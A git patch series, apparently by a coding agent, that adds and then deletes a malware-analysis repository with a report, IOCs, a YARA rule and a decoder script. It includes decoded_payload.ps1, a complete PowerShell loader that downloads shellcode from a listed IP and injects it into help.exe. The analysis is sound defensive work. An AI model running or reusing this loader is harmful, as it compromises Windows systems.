From 6003002736db03e6ac64cc2b3ec4fbfa655cd3a0 Mon Sep 17 00:00:00 2001 From: Cursor Agent Date: Mon, 29 Dec 2025 00:13:17 +0000 Subject: [PATCH 1/2] feat: Add malware analysis reports and scripts Co-authored-by: deluccafonseca.dev --- MALWARE_ANALYSIS_REPORT.md | 266 +++++++++++++++++++++++++++++++++++++ QUICK_REFERENCE.md | 132 ++++++++++++++++++ README.md | 222 +++++++++++++++++++++++++++++++ decoded_payload.ps1 | 101 ++++++++++++++ decrypt_payload.py | 95 +++++++++++++ 5 files changed, 816 insertions(+) create mode 100644 MALWARE_ANALYSIS_REPORT.md create mode 100644 QUICK_REFERENCE.md create mode 100644 README.md create mode 100644 decoded_payload.ps1 create mode 100644 decrypt_payload.py diff --git a/MALWARE_ANALYSIS_REPORT.md b/MALWARE_ANALYSIS_REPORT.md new file mode 100644 index 0000000..3babb2d --- /dev/null +++ b/MALWARE_ANALYSIS_REPORT.md 
@@ -0,0 +1,266 @@ +# Malware Analysis Report + +## Executive Summary + +**Threat Level:** 🔴 **CRITICAL** + +This is a **highly malicious** Windows batch script that employs multiple layers of obfuscation to download and execute shellcode via process injection. The malware uses advanced techniques to evade detection and inject malicious code into legitimate Windows processes. + +--- + +## Technical Analysis + +### 1. Initial Vector + +**File Type:** Windows Batch Script (.bat/.cmd) +**Execution Method:** Launches PowerShell in minimized window + +```batch +start /MIN "" %pspath% -command "..." +``` + +### 2. Obfuscation Layers + +The malware uses **multiple encoding layers**: + +1. **Layer 1:** Batch script wrapper +2. **Layer 2:** PowerShell scriptblock obfuscation +3. **Layer 3:** Hex-encoded payload +4. **Layer 4:** XOR encryption of the final shellcode + +### 3. Decoded PowerShell Payload + +The hex-encoded string decodes to PowerShell code that: + +#### A. Creates Windows API Bindings + +```csharp +// Defines C# structures and imports kernel32.dll functions +- PROCESS_INFORMATION struct +- STARTUPINFO struct +- Kernel32 class with P/Invoke declarations: + * CreateProcess + * GlobalAlloc + * VirtualAllocEx + * WriteProcessMemory + * CreateRemoteThread + * WaitForSingleObject +``` + +#### B. Downloads Encrypted Shellcode + +```powershell +$webClient = New-Object System.Net.WebClient +$url = "http://45.83.140.12/pot/jack/logo.bin" +$shellbuf = $webClient.DownloadData($url) +``` + +#### C. Decrypts Payload Using XOR + +```powershell +for ($i = 1; $i -lt $shellsize; $i++) { + $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] +} +``` + +The first byte of the downloaded file is used as the XOR key to decrypt the remaining bytes. + +#### D. Process Injection (Process Hollowing) + +1. **Creates suspended process:** `c:\windows\SysWOW64\help.exe` +2. **Allocates memory** in the target process +3. **Writes shellcode** to the allocated memory +4. 
**Creates remote thread** to execute the injected code +5. **Waits** for execution (500 seconds) + +--- + +## Indicators of Compromise (IOCs) + +### Network Indicators + +| Type | Value | Description | +|------|-------|-------------| +| IP Address | `45.83.140.12` | Malicious C2 server | +| URL | `http://45.83.140.12/pot/jack/logo.bin` | Shellcode download location | +| Protocol | HTTP | Unencrypted communication | + +### Host Indicators + +| Type | Value | Description | +|------|-------|-------------| +| Target Process | `c:\windows\SysWOW64\help.exe` | Injection target | +| PowerShell | Minimized window execution | Stealth execution | +| Memory Allocation | Flags: 0x40, 0x1000 | RWX memory regions | + +### File Artifacts + +- Downloaded binary: `logo.bin` (XOR-encrypted shellcode) +- Temporary allocations in process memory + +--- + +## MITRE ATT&CK Framework Mapping + +| Technique ID | Name | Description | +|--------------|------|-------------| +| **T1059.001** | PowerShell | Uses PowerShell for execution | +| **T1055** | Process Injection | Injects code into help.exe | +| **T1055.012** | Process Hollowing | Creates suspended process and injects code | +| **T1027** | Obfuscated Files or Information | Multiple encoding layers | +| **T1140** | Deobfuscate/Decode Files | XOR decryption routine | +| **T1106** | Native API | Direct kernel32.dll API calls | +| **T1071.001** | Web Protocols | Downloads payload via HTTP | + +--- + +## Attack Flow Diagram + +``` +[Batch Script] + ↓ +[Launch PowerShell (Minimized)] + ↓ +[Decode Hex-Encoded Payload] + ↓ +[Load Windows API Functions] + ↓ +[Download logo.bin from 45.83.140.12] + ↓ +[XOR Decrypt Shellcode] + ↓ +[Create Suspended Process: help.exe] + ↓ +[Inject Shellcode into Process Memory] + ↓ +[Execute Remote Thread] + ↓ +[Malicious Payload Runs] +``` + +--- + +## Evasion Techniques + +1. **Multi-layer encoding** - Hex encoding obscures PowerShell commands +2. **Minimized window** - Runs hidden from user +3. 
**Process injection** - Hides malicious code in legitimate process +4. **XOR encryption** - Encrypts final payload +5. **Legitimate process abuse** - Uses Windows help.exe +6. **In-memory execution** - No files written to disk (fileless) + +--- + +## Risk Assessment + +| Category | Rating | Notes | +|----------|--------|-------| +| **Severity** | 🔴 Critical | Full system compromise possible | +| **Stealth** | 🟠 High | Multiple evasion techniques | +| **Persistence** | 🟡 Medium | Not demonstrated in this sample | +| **Data Theft** | ⚠️ Unknown | Depends on downloaded payload | +| **Lateral Movement** | ⚠️ Possible | Depending on payload capabilities | + +--- + +## Recommendations + +### Immediate Actions + +1. ✅ **DO NOT execute this code** +2. 🚫 **Block malicious IP:** Add `45.83.140.12` to firewall blocklist +3. 🔍 **Scan system:** Run full antivirus/EDR scan +4. 📊 **Check logs:** Review PowerShell execution logs +5. 🔎 **Hunt for IOCs:** Search for related artifacts + +### Defensive Measures + +1. **Network Security:** + - Block access to `45.83.140.12` + - Monitor outbound HTTP connections to unusual IPs + - Implement DNS filtering + +2. **Endpoint Security:** + - Enable PowerShell logging (Module, Script Block, Transcription) + - Use Application Whitelisting + - Deploy EDR solution + - Enable AMSI (Anti-Malware Scan Interface) + +3. **Detection Rules:** + - Monitor for `CreateRemoteThread` API calls + - Alert on PowerShell with `-EncodedCommand` or long command strings + - Detect `VirtualAllocEx` + `WriteProcessMemory` patterns + - Flag suspicious help.exe executions + +4. 
**User Awareness:** + - Train users not to execute unknown scripts + - Warn about email attachments with .bat/.cmd extensions + - Implement email filtering for malicious attachments + +### YARA Rule (Detection) + +```yara +rule Malicious_ProcessInjection_XOR_Loader +{ + meta: + description = "Detects PowerShell-based process injection with XOR decryption" + author = "Security Analysis" + date = "2025-12-29" + + strings: + $api1 = "VirtualAllocEx" ascii wide + $api2 = "WriteProcessMemory" ascii wide + $api3 = "CreateRemoteThread" ascii wide + $xor = "-bxor" ascii wide + $download = "DownloadData" ascii wide + $help = "help.exe" ascii wide nocase + + condition: + 4 of them +} +``` + +--- + +## Forensic Artifacts + +If this malware was executed, look for: + +1. **PowerShell logs** (Event ID 4103, 4104) +2. **Network connections** to 45.83.140.12 +3. **Process creation** of help.exe with unusual parent process +4. **Memory dumps** of help.exe process +5. **Prefetch files** for PowerShell and help.exe + +--- + +## Conclusion + +This is a **sophisticated malware sample** that demonstrates: +- Advanced obfuscation techniques +- Process injection capabilities +- Remote payload delivery +- Anti-detection measures + +**The actual damage depends on the downloaded payload**, which could be: +- Ransomware +- Information stealer +- Remote Access Trojan (RAT) +- Cryptocurrency miner +- Botnet agent + +**⚠️ If you encountered this in the wild, treat it as a confirmed compromise and initiate incident response procedures immediately.** + +--- + +## References + +- MITRE ATT&CK: https://attack.mitre.org/ +- Process Injection Techniques: https://attack.mitre.org/techniques/T1055/ +- PowerShell Security Best Practices: Microsoft Security Documentation + +--- + +**Report Generated:** 2025-12-29 +**Analysis Status:** Complete +**Malware Classification:** Dropper/Loader with Process Injection diff --git a/QUICK_REFERENCE.md b/QUICK_REFERENCE.md new file mode 100644 index 0000000..fdd0b07 
--- /dev/null +++ b/QUICK_REFERENCE.md 
@@ -0,0 +1,132 @@ +# Quick Reference - Malware Analysis + +## 🔴 THREAT CLASSIFICATION: CRITICAL MALWARE + +--- + +## What It Does (Simple Explanation) + +This is a **malicious script** that: +1. Downloads encrypted malware from a hacker's server +2. Decrypts it using XOR encryption +3. Injects the malware into a legitimate Windows program (help.exe) +4. Executes the malware while hiding it from detection + +--- + +## Key Information + +### Malicious Server +- **IP Address:** `45.83.140.12` +- **Download URL:** `http://45.83.140.12/pot/jack/logo.bin` + +### Target Process +- **Injection Target:** `c:\windows\SysWOW64\help.exe` + +### Attack Type +- **Category:** Process Injection / Code Injection +- **Method:** Process Hollowing +- **Language:** PowerShell (hidden) + +--- + +## Malicious Behavior Checklist + +- ✅ Downloads code from internet +- ✅ Uses encryption (XOR) +- ✅ Injects code into other processes +- ✅ Runs hidden (minimized window) +- ✅ Uses multiple encoding layers +- ✅ Manipulates Windows memory directly +- ✅ Creates threads in other processes + +--- + +## How to Protect Yourself + +### If You Haven't Run It +✅ Delete it immediately +✅ Block the IP address: `45.83.140.12` +✅ Scan your computer with antivirus + +### If You Already Ran It +🚨 **Your computer may be compromised** + +1. Disconnect from internet immediately +2. Run full antivirus scan +3. Check for suspicious processes (especially help.exe) +4. Contact IT security team +5. Consider professional malware removal +6. Change all passwords from a clean device + +--- + +## Technical Details (For Security Professionals) + +### Obfuscation Layers +1. Batch wrapper → 2. PowerShell scriptblock → 3. Hex encoding → 4. 
XOR encryption + +### API Functions Used +- `CreateProcess` (CREATE_SUSPENDED flag) +- `VirtualAllocEx` (PAGE_EXECUTE_READWRITE) +- `WriteProcessMemory` +- `CreateRemoteThread` +- `WaitForSingleObject` + +### Memory Permissions +- `0x40` = PAGE_EXECUTE_READWRITE (RWX - highly suspicious) +- `0x1000` = MEM_COMMIT + +--- + +## Detection Signatures + +### PowerShell Command Line +``` +Contains: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, -bxor +``` + +### Network Traffic +``` +HTTP GET to 45.83.140.12/pot/jack/logo.bin +``` + +### Process Behavior +``` +help.exe spawned by PowerShell with unusual memory allocations +``` + +--- + +## MITRE ATT&CK Techniques +- T1059.001 - PowerShell +- T1055.012 - Process Hollowing +- T1027 - Obfuscated Files +- T1140 - Deobfuscate/Decode +- T1071.001 - Web Protocols + +--- + +## Files Generated by Analysis + +1. **MALWARE_ANALYSIS_REPORT.md** - Full technical analysis +2. **decoded_payload.ps1** - Decoded PowerShell code (DO NOT RUN) +3. **decrypt_payload.py** - Python decryption script +4. **QUICK_REFERENCE.md** - This file + +--- + +## Bottom Line + +⚠️ **This is REAL malware designed to compromise Windows systems.** + +- **DO NOT** run this code +- **DO NOT** click links in suspicious emails +- **DO** keep antivirus updated +- **DO** report to security team if found in your organization + +--- + +**Date:** December 29, 2025 +**Threat Level:** 🔴 CRITICAL +**Malware Type:** Dropper/Loader with Process Injection diff --git a/README.md b/README.md new file mode 100644 index 0000000..69f14dd --- /dev/null +++ b/README.md 
@@ -0,0 +1,222 @@ +# Malware Analysis - Payload Decryption and Analysis + +This repository contains a complete analysis of an obfuscated malicious Windows batch/PowerShell script that employs process injection techniques. + +## 🔴 CRITICAL WARNING + +**This repository contains analysis of REAL malware. DO NOT execute any of the decoded payloads.** + +--- + +## Overview + +The analyzed malware is a multi-stage dropper/loader that: +- Downloads encrypted shellcode from a remote server +- Decrypts the payload using XOR encryption +- Injects malicious code into legitimate Windows processes +- Executes using process hollowing techniques + +--- + +## Files in This Repository + +### Analysis Reports +- **[MALWARE_ANALYSIS_REPORT.md](MALWARE_ANALYSIS_REPORT.md)** - Comprehensive technical analysis +- **[QUICK_REFERENCE.md](QUICK_REFERENCE.md)** - Quick reference guide and IOCs + +### Decoded Payloads (DO NOT EXECUTE) +- **[decoded_payload.ps1](decoded_payload.ps1)** - Decoded PowerShell malware + +### Analysis Tools +- **[decrypt_payload.py](decrypt_payload.py)** - Python script to decode the hex-encoded payload + +--- + +## Quick Summary + +### Threat Level +🔴 **CRITICAL** + +### Malware Type +- Dropper/Loader +- Process Injection +- Shellcode Execution + +### Key IOCs + +**Malicious Infrastructure:** +``` +IP: 45.83.140.12 +URL: http://45.83.140.12/pot/jack/logo.bin +``` + +**Injection Target:** +``` +Process: c:\windows\SysWOW64\help.exe +``` + +### MITRE ATT&CK Techniques +- T1059.001 - PowerShell +- T1055.012 - Process Hollowing +- T1027 - Obfuscated Files or Information +- T1140 - Deobfuscate/Decode Files or Information +- T1071.001 - Web Protocols + +--- + +## How to Use This Analysis + +### For Security Analysts +1. Read the **MALWARE_ANALYSIS_REPORT.md** for detailed technical analysis +2. Use the IOCs to search your environment for compromise indicators +3. Implement the detection rules and defensive measures +4. 
Review the MITRE ATT&CK mappings for threat hunting + +### For Incident Responders +1. Check **QUICK_REFERENCE.md** for immediate IOCs +2. Block the malicious IP address: `45.83.140.12` +3. Hunt for the process injection patterns in your environment +4. Review PowerShell logs for similar obfuscation patterns + +### For Researchers +1. Examine the **decoded_payload.ps1** to understand the attack flow +2. Use **decrypt_payload.py** as a template for analyzing similar samples +3. Study the multi-layer obfuscation techniques employed + +--- + +## Running the Decryption Script + +To analyze the payload: + +```bash +python3 decrypt_payload.py +``` + +This will display: +- The decoded PowerShell payload +- Analysis summary +- IOCs +- Recommendations + +--- + +## Key Findings + +### Attack Flow +1. Batch script launches PowerShell in minimized window +2. PowerShell decodes hex-encoded payload +3. Creates Windows API bindings for process manipulation +4. Downloads encrypted shellcode from `45.83.140.12` +5. XOR-decrypts the payload using first byte as key +6. Creates suspended `help.exe` process +7. Injects shellcode into process memory +8. Executes malicious payload via remote thread + +### Evasion Techniques +- Multi-layer encoding (Batch → PowerShell → Hex → XOR) +- Minimized window execution +- Process injection to hide in legitimate process +- In-memory execution (fileless) +- XOR encryption of final payload + +--- + +## Recommendations + +### Immediate Actions +- ✅ Block IP address: `45.83.140.12` +- ✅ Enable PowerShell logging +- ✅ Monitor for process injection indicators +- ✅ Deploy EDR solution +- ✅ Scan systems for IOCs + +### Detection Rules +- Alert on `CreateRemoteThread` + `WriteProcessMemory` patterns +- Monitor PowerShell with long encoded commands +- Flag suspicious `help.exe` executions +- Detect XOR operations on downloaded content + +--- + +## Defensive Measures + +1. 
**Network Security** + - Block malicious IPs + - Monitor unusual HTTP connections + - Implement DNS filtering + +2. **Endpoint Security** + - Enable PowerShell logging (Script Block, Module, Transcription) + - Use Application Whitelisting + - Deploy EDR + - Enable AMSI + +3. **User Awareness** + - Train users on phishing + - Warn about suspicious attachments + - Implement email filtering + +--- + +## Technical Specifications + +**Programming Languages:** +- Windows Batch Script +- PowerShell +- C# (for P/Invoke declarations) + +**APIs Used:** +- `kernel32.dll` functions +- `CreateProcess` +- `VirtualAllocEx` +- `WriteProcessMemory` +- `CreateRemoteThread` + +**Encryption:** +- XOR with single-byte key (first byte of payload) + +**Network Protocol:** +- HTTP (unencrypted) + +--- + +## Disclaimer + +This analysis is provided for **educational and defensive purposes only**. The decoded malware samples are included to help security professionals understand the threat and develop appropriate defenses. + +**DO NOT:** +- Execute any of the decoded payloads +- Use this information for malicious purposes +- Access the malicious infrastructure + +**DO:** +- Use this analysis to protect your organization +- Share IOCs with your security team +- Implement the recommended defensive measures + +--- + +## Analysis Metadata + +- **Analysis Date:** December 29, 2025 +- **Malware Family:** Unknown (requires payload analysis) +- **Threat Actor:** Unknown +- **Campaign:** Unknown +- **Analysis Status:** Complete + +--- + +## Contact + +For questions about this analysis or to report similar samples, please consult with your organization's security team. + +--- + +## License + +This analysis is provided as-is for security research and defensive purposes. + +--- + +**Stay safe and keep your systems secure! 🛡️** diff --git a/decoded_payload.ps1 b/decoded_payload.ps1 new file mode 100644 index 0000000..a2b38ce --- /dev/null +++ b/decoded_payload.ps1 
@@ -0,0 +1,101 @@ +# ============================================================================ +# DECODED MALICIOUS POWERSHELL PAYLOAD +# ============================================================================ +# WARNING: DO NOT EXECUTE THIS CODE - FOR ANALYSIS ONLY +# This is the decoded version of the hex-encoded malware payload +# ============================================================================ + +Add-Type -TypeDefinition @" +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; +[StructLayout(LayoutKind.Sequential)] +public struct PROCESS_INFORMATION +{ + public IntPtr hP; + public IntPtr ht; + public uint dwProcessId; + public uint dwThreadId; +} +[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] +public struct STARTUPINFO +{ + public uint cb; + public string lpReserved; + public string lpDesktop; + public string lpTitle; + public uint dwX; + public uint dwY; + public uint dwXSize; + public uint dwYSize; + public uint dwXCountChars; + public uint dwYCountChars; + public uint dwFillAttribute; + public uint dwFlags; + public uint wShowWindow; + public short cbReserved2; + public IntPtr lpReserved2; + public IntPtr hStdInput; + public IntPtr hStdOutput; + public IntPtr hStdError; +} +public static class Kernel32 +{ + [DllImport("kernel32.dll")] + public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j); + [DllImport("kernel32.dll")] + public static extern IntPtr GlobalAlloc(uint a,uint b); + [DllImport("kernel32.dll")] + public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint e); + [DllImport("kernel32.dll")] + public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint d,IntPtr e); + [DllImport("kernel32.dll")] + public static extern IntPtr WaitForSingleObject(IntPtr a,uint b); + [DllImport("kernel32.dll")] + public static extern IntPtr CreateRemoteThread(IntPtr 
a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g); +} +"@ + +# Download encrypted shellcode from malicious server +$webClient = New-Object System.Net.WebClient +$url = "http://45.83.140.12/pot/jack/logo.bin" + +$shellbuf = $webClient.DownloadData($url) +$shellsize = $shellbuf.Length + +# XOR decrypt the downloaded payload using first byte as key +for ($i = 1; $i -lt $shellsize; $i++) { + $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] +} + +# Initialize structures for process creation +$si = New-Object STARTUPINFO; +$pi = New-Object PROCESS_INFORMATION; + +# Allocate global memory for shellcode +$addr = [Kernel32]::GlobalAlloc(0x40, $shellsize + 100); + +# Copy decrypted shellcode to allocated memory +for ($i = 1;$i -lt $shellsize;$i++){ + [System.Runtime.InteropServices.Marshal]::WriteByte($addr, $i - 1, $shellbuf[$i]); +} + +# Create suspended process (help.exe) for injection +# Flag 0x04 = CREATE_SUSPENDED +[Kernel32]::CreateProcess("c:\windows\SysWOW64\help.exe",0,0,0,0,0x04,0,"c:",[ref] $si,[ref] $pi); + +# Get handle to created process +$kZZZZ=$pi.hP; + +# Allocate memory in target process with RWX permissions +# 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE +$mZZZZ=[Kernel32]::VirtualAllocEx($kZZZZ,0,$shellsize + 100,0x1000,0x40); + +# Write shellcode to target process memory +[Kernel32]::WriteProcessMemory($kZZZZ,$mZZZZ,$addr, $shellsize, 0); + +# Create remote thread in target process to execute shellcode +$lZZZZ = [Kernel32]::CreateRemoteThread($kZZZZ, 0, 0, $mZZZZ, 0, 0, 0); + +# Wait for shellcode execution (500 seconds timeout) +[Kernel32]::WaitForSingleObject($lZZZZ, 500*1000); diff --git a/decrypt_payload.py b/decrypt_payload.py new file mode 100644 index 0000000..c9867fb --- /dev/null +++ b/decrypt_payload.py 
@@ -0,0 +1,95 @@ +#!/usr/bin/env python3 +""" +Payload Decryption and Analysis Script +This script safely decodes obfuscated malicious code without executing it. +""" + +def hex_to_string(hex_string): + """Convert hex string to ASCII string""" + result = "" + for i in range(0, len(hex_string), 2): + hex_byte = hex_string[i:i+2] + result += chr(int(hex_byte, 16)) + return result + +def main(): + # The hex-encoded payload from the malicious script + hex_payload = "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" + + print("=" * 80) + print("MALWARE ANALYSIS REPORT") + print("=" * 80) + print() + + # Decode the hex payload + decoded = hex_to_string(hex_payload) + + print("DECODED POWERSHELL PAYLOAD:") + print("-" * 80) + print(decoded) + print() + + print("=" * 80) + print("ANALYSIS SUMMARY") + print("=" * 80) + print() + print("⚠️ THREAT LEVEL: CRITICAL - This is MALICIOUS CODE") + print() + print("What this malware does:") + print() + print("1. PROCESS INJECTION TECHNIQUE:") + print(" - Creates Windows API definitions for process manipulation") + print(" - Uses kernel32.dll functions for memory manipulation") + print() + print("2. DOWNLOADS MALICIOUS PAYLOAD:") + print(" - URL: http://45.83.140.12/pot/jack/logo.bin") + print(" - Downloads binary shellcode from a remote server") + print() + print("3. XOR DECRYPTION:") + print(" - The downloaded payload is XOR-encrypted") + print(" - Uses first byte as the XOR key to decrypt the rest") + print(" - This obfuscates the actual malicious code") + print() + print("4. PROCESS INJECTION:") + print(" - Creates a suspended process: c:\\windows\\SysWOW64\\help.exe") + print(" - Allocates memory in the target process") + print(" - Writes the decrypted shellcode into the process memory") + print(" - Creates a remote thread to execute the injected code") + print(" - Waits for execution (500 seconds timeout)") + print() + print("5. 
EXECUTION METHOD:") + print(" - Runs in a minimized window to avoid detection") + print(" - Uses multiple encoding layers (hex encoding)") + print(" - Employs process hollowing/injection techniques") + print() + print("=" * 80) + print("INDICATORS OF COMPROMISE (IOCs)") + print("=" * 80) + print() + print("Malicious IP/URL:") + print(" - 45.83.140.12") + print(" - http://45.83.140.12/pot/jack/logo.bin") + print() + print("Targeted Process:") + print(" - c:\\windows\\SysWOW64\\help.exe") + print() + print("Techniques Used:") + print(" - T1055 - Process Injection") + print(" - T1055.012 - Process Hollowing") + print(" - T1027 - Obfuscated Files or Information") + print(" - T1140 - Deobfuscate/Decode Files or Information") + print(" - T1059.001 - PowerShell") + print() + print("=" * 80) + print("RECOMMENDATIONS") + print("=" * 80) + print() + print("1. DO NOT execute this code") + print("2. Block the malicious IP address: 45.83.140.12") + print("3. Scan your system with updated antivirus software") + print("4. Check for signs of compromise if this was executed") + print("5. Report this to your security team immediately") + print() + +if __name__ == "__main__": + main() From 0514fa23ba3f1a75d0852c38d0a9aa5f4808f404 Mon Sep 17 00:00:00 2001 From: Cursor Agent Date: Mon, 29 Dec 2025 00:15:52 +0000 Subject: [PATCH 2/2] feat: Remove analysis artifacts and documentation Co-authored-by: deluccafonseca.dev --- MALWARE_ANALYSIS_REPORT.md | 266 ------------------------------------- QUICK_REFERENCE.md | 132 ------------------ README.md | 222 ------------------------------- decoded_payload.ps1 | 101 -------------- decrypt_payload.py | 95 ------------- 5 files changed, 816 deletions(-) delete mode 100644 MALWARE_ANALYSIS_REPORT.md delete mode 100644 QUICK_REFERENCE.md delete mode 100644 README.md delete mode 100644 decoded_payload.ps1 delete mode 100644 decrypt_payload.py 
diff --git a/MALWARE_ANALYSIS_REPORT.md b/MALWARE_ANALYSIS_REPORT.md deleted file mode 100644 index 3babb2d..0000000 --- a/MALWARE_ANALYSIS_REPORT.md +++ /dev/null 
@@ -1,266 +0,0 @@ -# Malware Analysis Report - -## Executive Summary - -**Threat Level:** 🔴 **CRITICAL** - -This is a **highly malicious** Windows batch script that employs multiple layers of obfuscation to download and execute shellcode via process injection. The malware uses advanced techniques to evade detection and inject malicious code into legitimate Windows processes. - ---- - -## Technical Analysis - -### 1. Initial Vector - -**File Type:** Windows Batch Script (.bat/.cmd) -**Execution Method:** Launches PowerShell in minimized window - -```batch -start /MIN "" %pspath% -command "..." -``` - -### 2. Obfuscation Layers - -The malware uses **multiple encoding layers**: - -1. **Layer 1:** Batch script wrapper -2. **Layer 2:** PowerShell scriptblock obfuscation -3. **Layer 3:** Hex-encoded payload -4. **Layer 4:** XOR encryption of the final shellcode - -### 3. Decoded PowerShell Payload - -The hex-encoded string decodes to PowerShell code that: - -#### A. Creates Windows API Bindings - -```csharp -// Defines C# structures and imports kernel32.dll functions -- PROCESS_INFORMATION struct -- STARTUPINFO struct -- Kernel32 class with P/Invoke declarations: - * CreateProcess - * GlobalAlloc - * VirtualAllocEx - * WriteProcessMemory - * CreateRemoteThread - * WaitForSingleObject -``` - -#### B. Downloads Encrypted Shellcode - -```powershell -$webClient = New-Object System.Net.WebClient -$url = "http://45.83.140.12/pot/jack/logo.bin" -$shellbuf = $webClient.DownloadData($url) -``` - -#### C. Decrypts Payload Using XOR - -```powershell -for ($i = 1; $i -lt $shellsize; $i++) { - $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] -} -``` - -The first byte of the downloaded file is used as the XOR key to decrypt the remaining bytes. - -#### D. Process Injection (Process Hollowing) - -1. **Creates suspended process:** `c:\windows\SysWOW64\help.exe` -2. **Allocates memory** in the target process -3. **Writes shellcode** to the allocated memory -4. 
**Creates remote thread** to execute the injected code -5. **Waits** for execution (500 seconds) - ---- - -## Indicators of Compromise (IOCs) - -### Network Indicators - -| Type | Value | Description | -|------|-------|-------------| -| IP Address | `45.83.140.12` | Malicious C2 server | -| URL | `http://45.83.140.12/pot/jack/logo.bin` | Shellcode download location | -| Protocol | HTTP | Unencrypted communication | - -### Host Indicators - -| Type | Value | Description | -|------|-------|-------------| -| Target Process | `c:\windows\SysWOW64\help.exe` | Injection target | -| PowerShell | Minimized window execution | Stealth execution | -| Memory Allocation | Flags: 0x40, 0x1000 | RWX memory regions | - -### File Artifacts - -- Downloaded binary: `logo.bin` (XOR-encrypted shellcode) -- Temporary allocations in process memory - ---- - -## MITRE ATT&CK Framework Mapping - -| Technique ID | Name | Description | -|--------------|------|-------------| -| **T1059.001** | PowerShell | Uses PowerShell for execution | -| **T1055** | Process Injection | Injects code into help.exe | -| **T1055.012** | Process Hollowing | Creates suspended process and injects code | -| **T1027** | Obfuscated Files or Information | Multiple encoding layers | -| **T1140** | Deobfuscate/Decode Files | XOR decryption routine | -| **T1106** | Native API | Direct kernel32.dll API calls | -| **T1071.001** | Web Protocols | Downloads payload via HTTP | - ---- - -## Attack Flow Diagram - -``` -[Batch Script] - ↓ -[Launch PowerShell (Minimized)] - ↓ -[Decode Hex-Encoded Payload] - ↓ -[Load Windows API Functions] - ↓ -[Download logo.bin from 45.83.140.12] - ↓ -[XOR Decrypt Shellcode] - ↓ -[Create Suspended Process: help.exe] - ↓ -[Inject Shellcode into Process Memory] - ↓ -[Execute Remote Thread] - ↓ -[Malicious Payload Runs] -``` - ---- - -## Evasion Techniques - -1. **Multi-layer encoding** - Hex encoding obscures PowerShell commands -2. **Minimized window** - Runs hidden from user -3. 
**Process injection** - Hides malicious code in legitimate process -4. **XOR encryption** - Encrypts final payload -5. **Legitimate process abuse** - Uses Windows help.exe -6. **In-memory execution** - No files written to disk (fileless) - ---- - -## Risk Assessment - -| Category | Rating | Notes | -|----------|--------|-------| -| **Severity** | 🔴 Critical | Full system compromise possible | -| **Stealth** | 🟠 High | Multiple evasion techniques | -| **Persistence** | 🟡 Medium | Not demonstrated in this sample | -| **Data Theft** | ⚠️ Unknown | Depends on downloaded payload | -| **Lateral Movement** | ⚠️ Possible | Depending on payload capabilities | - ---- - -## Recommendations - -### Immediate Actions - -1. ✅ **DO NOT execute this code** -2. 🚫 **Block malicious IP:** Add `45.83.140.12` to firewall blocklist -3. 🔍 **Scan system:** Run full antivirus/EDR scan -4. 📊 **Check logs:** Review PowerShell execution logs -5. 🔎 **Hunt for IOCs:** Search for related artifacts - -### Defensive Measures - -1. **Network Security:** - - Block access to `45.83.140.12` - - Monitor outbound HTTP connections to unusual IPs - - Implement DNS filtering - -2. **Endpoint Security:** - - Enable PowerShell logging (Module, Script Block, Transcription) - - Use Application Whitelisting - - Deploy EDR solution - - Enable AMSI (Anti-Malware Scan Interface) - -3. **Detection Rules:** - - Monitor for `CreateRemoteThread` API calls - - Alert on PowerShell with `-EncodedCommand` or long command strings - - Detect `VirtualAllocEx` + `WriteProcessMemory` patterns - - Flag suspicious help.exe executions - -4. 
**User Awareness:** - - Train users not to execute unknown scripts - - Warn about email attachments with .bat/.cmd extensions - - Implement email filtering for malicious attachments - -### YARA Rule (Detection) - -```yara -rule Malicious_ProcessInjection_XOR_Loader -{ - meta: - description = "Detects PowerShell-based process injection with XOR decryption" - author = "Security Analysis" - date = "2025-12-29" - - strings: - $api1 = "VirtualAllocEx" ascii wide - $api2 = "WriteProcessMemory" ascii wide - $api3 = "CreateRemoteThread" ascii wide - $xor = "-bxor" ascii wide - $download = "DownloadData" ascii wide - $help = "help.exe" ascii wide nocase - - condition: - 4 of them -} -``` - ---- - -## Forensic Artifacts - -If this malware was executed, look for: - -1. **PowerShell logs** (Event ID 4103, 4104) -2. **Network connections** to 45.83.140.12 -3. **Process creation** of help.exe with unusual parent process -4. **Memory dumps** of help.exe process -5. **Prefetch files** for PowerShell and help.exe - ---- - -## Conclusion - -This is a **sophisticated malware sample** that demonstrates: -- Advanced obfuscation techniques -- Process injection capabilities -- Remote payload delivery -- Anti-detection measures - -**The actual damage depends on the downloaded payload**, which could be: -- Ransomware -- Information stealer -- Remote Access Trojan (RAT) -- Cryptocurrency miner -- Botnet agent - -**⚠️ If you encountered this in the wild, treat it as a confirmed compromise and initiate incident response procedures immediately.** - ---- - -## References - -- MITRE ATT&CK: https://attack.mitre.org/ -- Process Injection Techniques: https://attack.mitre.org/techniques/T1055/ -- PowerShell Security Best Practices: Microsoft Security Documentation - ---- - -**Report Generated:** 2025-12-29 -**Analysis Status:** Complete -**Malware Classification:** Dropper/Loader with Process Injection 
diff --git a/QUICK_REFERENCE.md b/QUICK_REFERENCE.md deleted file mode 100644 index fdd0b07..0000000 --- a/QUICK_REFERENCE.md +++ /dev/null 
